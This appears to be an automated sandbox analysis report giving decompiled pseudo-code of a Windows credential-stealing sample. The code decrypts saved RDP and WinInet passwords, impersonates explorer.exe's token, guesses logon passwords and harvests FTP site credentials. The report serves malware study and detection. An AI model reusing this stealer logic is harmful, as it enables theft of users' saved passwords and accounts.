                                                                        						__eflags = _v32;
                                                                        						if(_v32 != 0) {
                                                                        							_t51 = lstrlenA(_v28);
                                                                        							_t64 = _t51 >> 1;
                                                                        							_push(_t64);
                                                                        							while(1) {
                                                                        								_t65 = _t64;
                                                                        								__eflags = _t65;
                                                                        								if(_t65 == 0) {
                                                                        									break;
                                                                        								}
                                                                        								asm("lodsw");
                                                                        								__eflags = _t51 - 0x30;
                                                                        								if(_t51 < 0x30) {
                                                                        									L12:
                                                                        									_t53 = _t51 - 0x41 + 0xa;
                                                                        									__eflags = _t53;
                                                                        									L13:
                                                                        									__eflags = _t53 - 0x30;
                                                                        									if(_t53 < 0x30) {
                                                                        										L16:
                                                                        										_t55 = _t53 - 0x41 + 0xa;
                                                                        										__eflags = _t55;
                                                                        										L17:
                                                                        										_t51 = _t55 << 0x00000004 | _t55 << 0x00000004;
                                                                        										asm("stosb");
                                                                        										_t64 = _t65 - 1;
                                                                        										__eflags = _t64;
                                                                        										continue;
                                                                        									}
                                                                        									__eflags = _t53 - 0x39;
                                                                        									if(_t53 > 0x39) {
                                                                        										goto L16;
                                                                        									}
                                                                        									_t55 = _t53 - 0x30;
                                                                        									goto L17;
                                                                        								}
                                                                        								__eflags = _t51 - 0x39;
                                                                        								if(_t51 > 0x39) {
                                                                        									goto L12;
                                                                        								}
                                                                        								_t53 = _t51 - 0x30;
                                                                        								goto L13;
                                                                        							}
                                                                        							_pop(_t66);
                                                                        							_v40 = _t66;
                                                                        							_push(_v28);
                                                                        							_pop( *_t22);
                                                                        							_v44 = 0;
                                                                        							_t59 =  *0x41442d( &_v40, 0, 0, 0, 0, 1,  &_v48);
                                                                        							__eflags = _t59;
                                                                        							if(_t59 != 0) {
                                                                        								__eflags = _v44;
                                                                        								if(__eflags != 0) {
                                                                        									E0040CC8E(__eflags, _a4, _v24, _v32, _v44, _v48);
                                                                        									LocalFree(_v44);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L22;
                                                                        					}
                                                                        					return _t40;
                                                                        				} else {
                                                                        					return __eax;
                                                                        				}
                                                                        			}























                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040CF47
                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040CFAD
                                                                        • LocalFree.KERNEL32(00000000), ref: 0040CFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CryptDataFreeLocalUnprotectlstrlen
                                                                        • String ID: full address:s:$password 51:b:$username:s:
                                                                        • API String ID: 2920030623-2945746679
                                                                        • Opcode ID: 3fe55126ee548df5cd7947a5c5ab92820d57a4bc6a1a7a61529fff14c4b352be
                                                                        • Instruction ID: 60ed0193d19ee7ec15275bf9add7d535b63f43271d864edcc8c9435468f68b04
                                                                        • Opcode Fuzzy Hash: 3fe55126ee548df5cd7947a5c5ab92820d57a4bc6a1a7a61529fff14c4b352be
                                                                        • Instruction Fuzzy Hash: CB412B7285010AEADF119BE1CD46BEEBB76AB48314F14023BE201711E0D6B94A92DB5E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CredEnumerateA.ADVAPI32(Microsoft_WinInet_*,00000000,00000000,00000000), ref: 0040A62F
                                                                        • lstrlenW.KERNEL32(00415B17,?,?,00000000), ref: 0040A66D
                                                                        • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A69D
                                                                        • LocalFree.KERNEL32(00000000), ref: 0040A6CF
                                                                        • CredFree.ADVAPI32(00000000), ref: 0040A6ED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CredFree$CryptDataEnumerateLocalUnprotectlstrlen
                                                                        • String ID: Microsoft_WinInet_*
                                                                        • API String ID: 3891647360-439986189
                                                                        • Opcode ID: 576424615bffc08a157af85e91cbfbecc0d476d7a66ca4336e9b72815a3144d6
                                                                        • Instruction ID: 303936e2a8a44d611f5ab066420c5948f3d508f4a04a3d0421c5e20b59dd798b
                                                                        • Opcode Fuzzy Hash: 576424615bffc08a157af85e91cbfbecc0d476d7a66ca4336e9b72815a3144d6
                                                                        • Instruction Fuzzy Hash: 38312972900209EBDF219F84DC0ABEEB7B4EB44305F184436E550B62D0D7B95AD4DBAA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 57%
                                                                        			E00402D57(void* __ebx) {
                                                                        				int _t25;
                                                                        				void* _t33;
                                                                        				void* _t36;
                                                                        				void* _t45;
                                                                        				void* _t49;
                                                                        				int _t51;
                                                                        				void* _t52;
                                                                        
                                                                        				_t49 = __ebx;
                                                                        				while(1) {
                                                                        					L15:
                                                                        					while(1) {
                                                                        						L17:
                                                                        						_t25 = Process32Next( *(_t52 - 0x138), _t52 - 0x134);
                                                                        						L1:
                                                                        						if(_t25 != 0) {
                                                                        							L2:
                                                                        							if(StrStrIA(_t52 - 0x110, "explorer.exe") == 0) {
                                                                        								L17:
                                                                        								_t25 = Process32Next( *(_t52 - 0x138), _t52 - 0x134);
                                                                        								goto L1;
                                                                        							} else {
                                                                        								L3:
                                                                        								 *(_t52 - 0x13c) = 0;
                                                                        								_t33 =  *0x4143d5( *(_t52 - 0x12c), _t52 - 0x13c);
                                                                        								_t51 =  *(_t52 - 0x13c);
                                                                        								if(_t33 == 0 || _t51 !=  *((intOrPtr*)(_t52 - 0xc))) {
                                                                        									continue;
                                                                        								} else {
                                                                        									L5:
                                                                        									_t36 = OpenProcess(0x2000000, 0,  *(_t52 - 0x12c));
                                                                        									if(_t36 == 0) {
                                                                        										continue;
                                                                        									} else {
                                                                        										L6:
                                                                        										 *(_t52 - 8) = _t36;
                                                                        										_push(_t52 - 4);
                                                                        										_push(0x201eb);
                                                                        										_push( *(_t52 - 8));
                                                                        										if( *0x41440d() == 0) {
                                                                        											CloseHandle( *(_t52 - 8));
                                                                        											continue;
                                                                        											do {
                                                                        												do {
                                                                        													do {
                                                                        														goto L17;
                                                                        													} while (StrStrIA(_t52 - 0x110, "explorer.exe") == 0);
                                                                        													goto L3;
                                                                        												} while (_t33 == 0 || _t51 !=  *((intOrPtr*)(_t52 - 0xc)));
                                                                        												goto L5;
                                                                        											} while (_t36 == 0);
                                                                        											goto L6;
                                                                        										} else {
                                                                        											_push( *(_t52 - 4));
                                                                        											if( *0x414411() == 0) {
                                                                        												CloseHandle( *(_t52 - 4));
                                                                        												CloseHandle( *(_t52 - 8));
                                                                        												goto L15;
                                                                        											} else {
                                                                        												_t49 = _t49 + 1;
                                                                        												 *(_t52 - 0x140) = 0;
                                                                        												_t45 = _t52 - 0x140;
                                                                        												_push(_t45);
                                                                        												_push(0xf003f);
                                                                        												L00410E12();
                                                                        												if(_t45 == 0 &&  *(_t52 - 0x140) != 0) {
                                                                        													 *0x4140fe =  *(_t52 - 0x140);
                                                                        												}
                                                                        												if( *((intOrPtr*)(_t52 + 8)) != 0) {
                                                                        													 *__eax =  *(_t52 - 4);
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						CloseHandle( *(_t52 - 0x138));
                                                                        						return _t49;
                                                                        					}
                                                                        				}
                                                                        			}











                                                                        APIs
                                                                        • StrStrIA.SHLWAPI(?,explorer.exe,?,00000128,00000002,00000000), ref: 00402C93
                                                                        • OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402CE1
                                                                        • RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402D2B
                                                                        • CloseHandle.KERNEL32(00410C2C), ref: 00402D5C
                                                                        • CloseHandle.KERNEL32(00410B93,00410C2C), ref: 00402D64
                                                                        • CloseHandle.KERNEL32(00410B93), ref: 00402D6E
                                                                        • Process32Next.KERNEL32 ref: 00402D80
                                                                        • CloseHandle.KERNEL32(?,?,00000128,00000002,00000000), ref: 00402D90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseHandle$Open$CurrentNextProcessProcess32User
                                                                        • String ID: explorer.exe
                                                                        • API String ID: 2771112661-3187896405
                                                                        • Opcode ID: aef6317e5045ecaeae95ce1e29d41b5616d0a15dd4b1757b2ee98fb37c85f866
                                                                        • Instruction ID: b299d969079444cf023299e81dd2094d9188d3462d9269bcd78f4557cfd88060
                                                                        • Opcode Fuzzy Hash: aef6317e5045ecaeae95ce1e29d41b5616d0a15dd4b1757b2ee98fb37c85f866
                                                                        • Instruction Fuzzy Hash: C7213A72A00518EBDF229B61DD4ABED7A74AF04304F1440B6A104B51E1E7BC9E91DF59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E0040912E(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v20;
                                                                        				int _v24;
                                                                        				int _v28;
                                                                        				int* _v32;
                                                                        				int* _v36;
                                                                        				int* _v40;
                                                                        				int* _v44;
                                                                        				int* _v48;
                                                                        				CHAR* _v52;
                                                                        				CHAR* _v56;
                                                                        				CHAR* _v60;
                                                                        				CHAR* _v64;
                                                                        				char* _v68;
                                                                        				int _v72;
                                                                        				int _v76;
                                                                        				int _v80;
                                                                        				void* _t85;
                                                                        				int _t87;
                                                                        				int _t90;
                                                                        				int _t94;
                                                                        				int _t101;
                                                                        				int _t108;
                                                                        				int _t110;
                                                                        				int _t115;
                                                                        				int _t133;
                                                                        				int _t136;
                                                                        				int _t138;
                                                                        				void* _t140;
                                                                        				int _t141;
                                                                        				int* _t143;
                                                                        
                                                                        				_t85 = E00401E53(_a8);
                                                                        				if(_t85 != 0) {
                                                                        					_t87 = E00403F1F(_a8);
                                                                        					__eflags = _t87;
                                                                        					if(_t87 == 0) {
                                                                        						E00408EC5(_a12, _a16);
                                                                        						_t90 = E00401F1B(__eflags, _a8,  &_v20);
                                                                        						__eflags = _t90;
                                                                        						if(_t90 != 0) {
                                                                        							_t94 = E00402515(_v12, _v8);
                                                                        							__eflags = _t94;
                                                                        							if(_t94 != 0) {
                                                                        								_v24 = _t94;
                                                                        								_t143 = _t94;
                                                                        								__eflags =  *_t143;
                                                                        								if(__eflags != 0) {
                                                                        									_v52 = E004090F2(__eflags, _t143);
                                                                        									_push(lstrcmpA("#2c", _v52));
                                                                        									_push(lstrcmpA("#2d", _v52));
                                                                        									_t101 = lstrcmpA("#2e", _v52);
                                                                        									_pop(_t141);
                                                                        									_pop(_t138);
                                                                        									__eflags = _t101;
                                                                        									if(_t101 == 0) {
                                                                        										L10:
                                                                        										__eflags = _t138;
                                                                        										if(_t138 != 0) {
                                                                        											_v80 = 0;
                                                                        										} else {
                                                                        											_v80 = 1;
                                                                        										}
                                                                        										asm("cld");
                                                                        										_t140 = 0xffffffff;
                                                                        										asm("repne scasb");
                                                                        										__eflags =  *_t143;
                                                                        										if ( *_t143 != 0) goto L14;
                                                                        										_v28 = 0;
                                                                        										while(1) {
                                                                        											__eflags =  *_t143;
                                                                        											if(__eflags == 0) {
                                                                        												goto L54;
                                                                        											}
                                                                        											_v56 = E004090F2(__eflags, _t143);
                                                                        											__eflags = _v28;
                                                                        											if(_v28 != 0) {
                                                                        												__eflags = _v28 - 1;
                                                                        												if(_v28 != 1) {
                                                                        													__eflags = _v28 - 2;
                                                                        													if(_v28 != 2) {
                                                                        														__eflags = _v28 - 3;
                                                                        														if(_v28 != 3) {
                                                                        															__eflags = _v28 - 4;
                                                                        															if(_v28 != 4) {
                                                                        																__eflags = _v28 - 5;
                                                                        																if(_v28 != 5) {
                                                                        																	__eflags = _v28 - 6;
                                                                        																	if(_v28 == 6) {
                                                                        																		_v28 = 2;
                                                                        																	}
                                                                        																} else {
                                                                        																	_v48 = _t143;
                                                                        																	__eflags = _v80;
                                                                        																	if(__eflags == 0) {
                                                                        																		_v28 = 6;
                                                                        																	} else {
                                                                        																		_v28 = 2;
                                                                        																	}
                                                                        																	_v68 = 0;
                                                                        																	_v60 = 0;
                                                                        																	_v64 = 0;
                                                                        																	_v72 = 0;
                                                                        																	_v76 = 0;
                                                                        																	_v68 = E004090F2(__eflags, _v32);
                                                                        																	_v60 = E004090F2(__eflags, _v40);
                                                                        																	_v64 = E004090F2(__eflags, _v48);
                                                                        																	__eflags =  *0x415824;
                                                                        																	if( *0x415824 != 0) {
                                                                        																		__eflags =  *0x415824 - 1;
                                                                        																		if( *0x415824 != 1) {
                                                                        																			_t115 = 0;
                                                                        																			__eflags = 0;
                                                                        																		} else {
                                                                        																			_t115 = StrCmpNIA(_v68, "ftp.", lstrlenA("ftp."));
                                                                        																		}
                                                                        																	} else {
                                                                        																		_t133 = StrCmpNIA(_v68, "ftp://", lstrlenA("ftp://"));
                                                                        																		__eflags = _t133;
                                                                        																		if(_t133 != 0) {
                                                                        																			_t133 = StrCmpNIA(_v68, "http://", lstrlenA("http://"));
                                                                        																		}
                                                                        																		_t115 = _t133;
                                                                        																		__eflags = _t115;
                                                                        																		if(_t115 != 0) {
                                                                        																			_t115 = StrCmpNIA(_v68, "https://", lstrlenA("https://"));
                                                                        																		}
                                                                        																	}
                                                                        																	__eflags = _t115;
                                                                        																	if(_t115 == 0) {
                                                                        																		_v72 = E00408FA6(_t140, _v60, lstrlenA(_v60));
                                                                        																		_v76 = E00408FA6(_t140, _v64, lstrlenA(_v64));
                                                                        																		__eflags = _v68;
                                                                        																		if(_v68 != 0) {
                                                                        																			__eflags = _v76;
                                                                        																			if(_v76 != 0) {
                                                                        																				E00401486(_a4, 0xbeef0000);
                                                                        																				E004014E8(_a4, _v68);
                                                                        																				E004014E8(_a4, _v72);
                                                                        																				E004014E8(_a4, _v76);
                                                                        																			}
                                                                        																		}
                                                                        																	}
                                                                        																	E004017D5(_v68);
                                                                        																	E004017D5(_v60);
                                                                        																	E004017D5(_v64);
                                                                        																	E004017D5(_v72);
                                                                        																	E004017D5(_v76);
                                                                        																}
                                                                        															} else {
                                                                        																_v44 = _t143;
                                                                        																_v28 = 5;
                                                                        															}
                                                                        														} else {
                                                                        															_v40 = _t143;
                                                                        															_v28 = 4;
                                                                        														}
                                                                        													} else {
                                                                        														_v36 = _t143;
                                                                        														_v28 = 3;
                                                                        													}
                                                                        												} else {
                                                                        													_v32 = _t143;
                                                                        													_v28 = 2;
                                                                        												}
                                                                        												__eflags = _v28;
                                                                        												if(_v28 != 0) {
                                                                        													_t108 = lstrcmpA(_v56, 0x414806);
                                                                        													__eflags = _t108;
                                                                        													if(_t108 == 0) {
                                                                        														_v28 = 1;
                                                                        													}
                                                                        													_t110 = lstrcmpA(_v56, "---");
                                                                        													__eflags = _t110;
                                                                        													if(_t110 == 0) {
                                                                        														_v28 = 2;
                                                                        													}
                                                                        												}
                                                                        											} else {
                                                                        												_t136 = lstrcmpA(_v56, 0x414806);
                                                                        												__eflags = _t136;
                                                                        												if(_t136 == 0) {
                                                                        													_v28 = 1;
                                                                        												}
                                                                        											}
                                                                        											E004017D5(_v56);
                                                                        											asm("cld");
                                                                        											_t140 = 0xffffffff;
                                                                        											asm("repne scasb");
                                                                        											__eflags =  *_t143;
                                                                        											if( *_t143 != 0) {
                                                                        												continue;
                                                                        											}
                                                                        											goto L54;
                                                                        										}
                                                                        									} else {
                                                                        										__eflags = _t141;
                                                                        										if(_t141 == 0) {
                                                                        											goto L10;
                                                                        										} else {
                                                                        											_t138 = _t138;
                                                                        											__eflags = _t138;
                                                                        											if(_t138 == 0) {
                                                                        												goto L10;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        									L54:
                                                                        									E004017D5(_v52);
                                                                        								}
                                                                        								E004017D5(_v24);
                                                                        							}
                                                                        							E00401FB0( &_v20);
                                                                        						}
                                                                        						return E00408F7D();
                                                                        					} else {
                                                                        						return _t87;
                                                                        					}
                                                                        				} else {
                                                                        					return _t85;
                                                                        				}
                                                                        			}




































                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #2c$#2d$#2e$---$ftp.$ftp://$http://$https://
                                                                        • API String ID: 0-1526611526
                                                                        • Opcode ID: 44378f815597745bbc4f01509e57f7de6c1b5a1070497c7f43b3eeb3b84ec0c5
                                                                        • Instruction ID: 96101fffbdba439034eac4df85c0c476d3f464cc9ab40425e2c0fc1f81b8675a
                                                                        • Opcode Fuzzy Hash: 44378f815597745bbc4f01509e57f7de6c1b5a1070497c7f43b3eeb3b84ec0c5
                                                                        • Instruction Fuzzy Hash: C391597190420AEADF21AFA1DD46BEEBAB1AF54308F24403BF011B11E2D7BD0D91DB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 65%
                                                                        			E00402C05(void* __eax, void* __edx, intOrPtr _a4) {
                                                                        				void* _v8;
                                                                        				void* _v12;
                                                                        				intOrPtr _v16;
                                                                        				char _v276;
                                                                        				long _v304;
                                                                        				void* _v312;
                                                                        				void* _v316;
                                                                        				int _v320;
                                                                        				int _v324;
                                                                        				void* _t33;
                                                                        				int _t36;
                                                                        				void* _t44;
                                                                        				void* _t47;
                                                                        				int* _t56;
                                                                        				void* _t60;
                                                                        				int _t64;
                                                                        
                                                                        				if( *0x4143d1 == 0 ||  *0x4143d5 == 0 ||  *0x41440d == 0 ||  *0x414411 == 0) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t60 = 0;
                                                                        					_v16 =  *0x4143d1();
                                                                        					_v312 = 0x128;
                                                                        					_t33 = CreateToolhelp32Snapshot(2, 0);
                                                                        					if(_t33 != 0xffffffff) {
                                                                        						_v316 = _t33;
                                                                        						_t36 = Process32First(_v316,  &_v312);
                                                                        						while(_t36 != 0) {
                                                                        							if(StrStrIA( &_v276, "explorer.exe") == 0) {
                                                                        								L23:
                                                                        								_t36 = Process32Next(_v316,  &_v312);
                                                                        								continue;
                                                                        							} else {
                                                                        								_v320 = 0;
                                                                        								_t44 =  *0x4143d5(_v304,  &_v320);
                                                                        								_t64 = _v320;
                                                                        								if(_t44 == 0 || _t64 != _v16) {
                                                                        									goto L23;
                                                                        								} else {
                                                                        									_t47 = OpenProcess(0x2000000, 0, _v304);
                                                                        									if(_t47 == 0) {
                                                                        										goto L23;
                                                                        									} else {
                                                                        										_v12 = _t47;
                                                                        										if(OpenProcessToken(_v12, 0x201eb,  &_v8) == 0) {
                                                                        											CloseHandle(_v12);
                                                                        											goto L23;
                                                                        										} else {
                                                                        											if(ImpersonateLoggedOnUser(_v8) == 0) {
                                                                        												CloseHandle(_v8);
                                                                        												CloseHandle(_v12);
                                                                        												goto L23;
                                                                        											} else {
                                                                        												_t60 = _t60 + 1;
                                                                        												_v324 = 0;
                                                                        												_t56 =  &_v324;
                                                                        												_push(_t56);
                                                                        												_push(0xf003f);
                                                                        												L00410E12();
                                                                        												if(_t56 == 0 && _v324 != 0) {
                                                                        													_push(_v324);
                                                                        													_pop( *0x4140fe);
                                                                        												}
                                                                        												if(_a4 != 0) {
                                                                        													_push(_v8);
                                                                        													_pop( *__eax);
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						CloseHandle(_v316);
                                                                        					}
                                                                        					return _t60;
                                                                        				}
                                                                        			}




















                                                                        APIs
                                                                        • WTSGetActiveConsoleSessionId.KERNEL32(?,?,00410B93,00410C2C), ref: 00402C42
                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00402C59
                                                                        • Process32First.KERNEL32 ref: 00402C7A
                                                                        • StrStrIA.SHLWAPI(?,explorer.exe,?,00000128,00000002,00000000), ref: 00402C93
                                                                        • ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,00000128,?,explorer.exe,?,00000128,00000002,00000000), ref: 00402CB7
                                                                        • OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402CE1
                                                                        • OpenProcessToken.ADVAPI32(00410B93,000201EB,00410C2C,02000000,00000000,?), ref: 00402CFD
                                                                        • ImpersonateLoggedOnUser.ADVAPI32(00410C2C), ref: 00402D0A
                                                                        • RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402D2B
                                                                        • CloseHandle.KERNEL32(?,?,00000128,00000002,00000000), ref: 00402D90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: OpenProcess$SessionUser$ActiveCloseConsoleCreateCurrentFirstHandleImpersonateLoggedProcess32SnapshotTokenToolhelp32
                                                                        • String ID: explorer.exe
                                                                        • API String ID: 4004126742-3187896405
                                                                        • Opcode ID: d7b33712bffa344649a6c7b91db19c6665e4b5ef021c38cbfc5ccfe492207028
                                                                        • Instruction ID: ccbd0d7988a87a0baa37139996db17261bf584517116b24148bb5ef45f8ddf5c
                                                                        • Opcode Fuzzy Hash: d7b33712bffa344649a6c7b91db19c6665e4b5ef021c38cbfc5ccfe492207028
                                                                        • Instruction Fuzzy Hash: 15418B72900218ABDF219F61DD4ABDE7AB5AF04304F0085B6A104B51E1EBFC9ED1DE58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E0041098D(signed int __eax, void* __ecx, signed int __edx) {
                                                                        				void* _v8;
                                                                        				CHAR* _v12;
                                                                        				char _v16;
                                                                        				CHAR* _v20;
                                                                        				CHAR* _v24;
                                                                        				CHAR* _v28;
                                                                        				void* _v32;
                                                                        				void* _v36;
                                                                        				char _v40;
                                                                        				char _v44;
                                                                        				char _v48;
                                                                        				char _t46;
                                                                        				char _t50;
                                                                        				char _t54;
                                                                        				char _t57;
                                                                        				char _t59;
                                                                        				char _t65;
                                                                        				int _t68;
                                                                        				char _t69;
                                                                        				char _t70;
                                                                        				void* _t71;
                                                                        				signed int _t73;
                                                                        				signed int _t74;
                                                                        				CHAR* _t75;
                                                                        
                                                                        				_t71 = __ecx;
                                                                        				_t73 = __edx ^ __eax;
                                                                        				_t42 = __eax ^ _t73;
                                                                        				_t74 = _t73 ^ __eax ^ _t73;
                                                                        				if( *0x414411 == 0 ||  *0x41441d == 0) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t69 =  *0x417691; // 0x6cd078
                                                                        					while(1) {
                                                                        						_t70 = _t69;
                                                                        						__eflags = _t70;
                                                                        						if(_t70 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						E00402AF8(_t42, _t74);
                                                                        						__eflags =  *0x417695;
                                                                        						if( *0x417695 == 0) {
                                                                        							L7:
                                                                        							_v8 = 0;
                                                                        							_t46 = LogonUserA( *(_t70 + 4), 0,  *(_t70 + 4), 2, 0,  &_v8);
                                                                        							__eflags = _t46;
                                                                        							if(_t46 == 0) {
                                                                        								_v12 = E0040294B( *(_t70 + 4));
                                                                        								_t50 = LCMapStringA(0x400, 0x100,  *(_t70 + 4), lstrlenA( *(_t70 + 4)), _v12, _t49);
                                                                        								__eflags = _t50;
                                                                        								if(_t50 == 0) {
                                                                        									L12:
                                                                        									E004017D5(_v12);
                                                                        									_t75 = "samantha";
                                                                        									L13:
                                                                        									_v8 = 0;
                                                                        									_t54 = LogonUserA( *(_t70 + 4), 0, _t75, 2, 0,  &_v8);
                                                                        									__eflags = _t54;
                                                                        									if(_t54 != 0) {
                                                                        										goto L14;
                                                                        									}
                                                                        								} else {
                                                                        									_v8 = 0;
                                                                        									_t65 = LogonUserA( *(_t70 + 4), 0, _v12, 2, 0,  &_v8);
                                                                        									__eflags = _t65;
                                                                        									if(_t65 == 0) {
                                                                        										goto L12;
                                                                        									} else {
                                                                        										E004017D5(_v12);
                                                                        										goto L14;
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								L14:
                                                                        								_v44 = 0x20;
                                                                        								_v40 = 1;
                                                                        								 *_t23 =  *(_t70 + 4);
                                                                        								 *_t25 =  *((intOrPtr*)(_t70 + 8));
                                                                        								_v28 = 0;
                                                                        								_v24 = 0;
                                                                        								_v20 = 0;
                                                                        								_v16 = 0;
                                                                        								_t57 =  &_v44;
                                                                        								_push(_t57);
                                                                        								_push(_v8);
                                                                        								L00410E96();
                                                                        								__eflags = _t57;
                                                                        								if(_t57 == 0) {
                                                                        									_v48 = 0;
                                                                        								} else {
                                                                        									__eflags = _v16;
                                                                        									if(_v16 != 0) {
                                                                        										_push(_v16);
                                                                        										_pop( *0x4140fe);
                                                                        									}
                                                                        									_v48 = 1;
                                                                        								}
                                                                        								_t59 = ImpersonateLoggedOnUser(_v8);
                                                                        								_t60 = _t59;
                                                                        								__eflags = _t59;
                                                                        								if(__eflags != 0) {
                                                                        									E004105CE(_t60, _t71, _t74, __eflags);
                                                                        									__eflags =  *0x414409;
                                                                        									if( *0x414409 != 0) {
                                                                        										RevertToSelf();
                                                                        									}
                                                                        									 *0x4140fe = 0x80000001;
                                                                        								}
                                                                        								__eflags = _v48;
                                                                        								if(_v48 != 0) {
                                                                        									_push(_v16);
                                                                        									_push(_v8);
                                                                        									L00410E9C();
                                                                        								}
                                                                        								CloseHandle(_v8);
                                                                        							}
                                                                        							asm("cld");
                                                                        							_t42 = 0;
                                                                        							_t71 = 0xffffffff;
                                                                        							asm("repne scasb");
                                                                        							__eflags =  *_t75;
                                                                        							if( *_t75 != 0) {
                                                                        								goto L13;
                                                                        							}
                                                                        						} else {
                                                                        							_t68 = lstrcmpiA( *0x417695,  *(_t70 + 4));
                                                                        							_t42 = _t68;
                                                                        							__eflags = _t68;
                                                                        							if(_t68 != 0) {
                                                                        								goto L7;
                                                                        							} else {
                                                                        							}
                                                                        						}
                                                                        						_t69 =  *_t70;
                                                                        					}
                                                                        					return 1;
                                                                        				}
                                                                        			}




























                                                                        APIs
                                                                        • lstrcmpiA.KERNEL32(?), ref: 004109D5
                                                                        • LogonUserA.ADVAPI32(?,00000000,?,00000002,00000000,00000000), ref: 004109FA
                                                                        • lstrlenA.KERNEL32(?,?), ref: 00410A17
                                                                        • LCMapStringA.KERNEL32(00000400,00000100,?,00000000,?,00000000,?,?), ref: 00410A2E
                                                                        • LogonUserA.ADVAPI32(?,00000000,?,00000002,00000000,00000000), ref: 00410A4E
                                                                        • LoadUserProfileA.USERENV(00000000,00000020,?,?), ref: 00410ACF
                                                                        • ImpersonateLoggedOnUser.ADVAPI32(00000000,00000000,00000020,?,?), ref: 00410AFA
                                                                        • RevertToSelf.ADVAPI32 ref: 00410B12
                                                                        • UnloadUserProfile.USERENV(00000000,00000000), ref: 00410B2E
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00410B36
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: User$LogonProfile$CloseHandleImpersonateLoadLoggedRevertSelfStringUnloadlstrcmpilstrlen
                                                                        • String ID: $samantha
                                                                        • API String ID: 1348396137-1937562511
                                                                        • Opcode ID: e8c680e9c729fbd071ccc07f1bc87b888f040c63c80d600780040c0011251876
                                                                        • Instruction ID: 97e36a9f464fd7594aaf26f4fe361f5543e1ef418d0b81fc890e2415056c999a
                                                                        • Opcode Fuzzy Hash: e8c680e9c729fbd071ccc07f1bc87b888f040c63c80d600780040c0011251876
                                                                        • Instruction Fuzzy Hash: 54516E71A00208EFEF119FA1DD46BDEBA75EB04318F14C066E510A91E2D7F99AD0DF29
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040A88E(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				CHAR* _v8;
                                                                        				CHAR* _v12;
                                                                        				CHAR* _v16;
                                                                        				CHAR* _v20;
                                                                        				CHAR* _v24;
                                                                        				CHAR* _v28;
                                                                        				CHAR* _v32;
                                                                        				intOrPtr _v36;
                                                                        				intOrPtr _v40;
                                                                        				intOrPtr _v44;
                                                                        				intOrPtr _v48;
                                                                        				intOrPtr _v52;
                                                                        				intOrPtr* _v56;
                                                                        				char _v60;
                                                                        				char _v64;
                                                                        				char _v68;
                                                                        
                                                                        				_v8 = E004017EC(0x2000);
                                                                        				_v12 = E004017EC(0x2000);
                                                                        				_v16 = E004017EC(0x2000);
                                                                        				_v20 = E004017EC(0x2000);
                                                                        				_v24 = E004017EC(0x2000);
                                                                        				_v28 = E004017EC(0x2000);
                                                                        				_v32 = E004017EC(0x2000);
                                                                        				wsprintfA(_v8, "SiteServer %d\\Host", _a12);
                                                                        				wsprintfA(_v12, "SiteServer %d\\WebUrl", _a12);
                                                                        				wsprintfA(_v16, "SiteServer %d\\Remote Directory", _a12);
                                                                        				wsprintfA(_v20, "SiteServer %d-User", _a12);
                                                                        				wsprintfA(_v24, "SiteServer %d-User PW", _a12);
                                                                        				wsprintfA(_v28, "%s\\Keychain", _a8);
                                                                        				wsprintfA(_v32, "SiteServer %d\\SFTP", _a12);
                                                                        				_v36 = E00401C8E( *0x4140fe, _a8, _v8, 0);
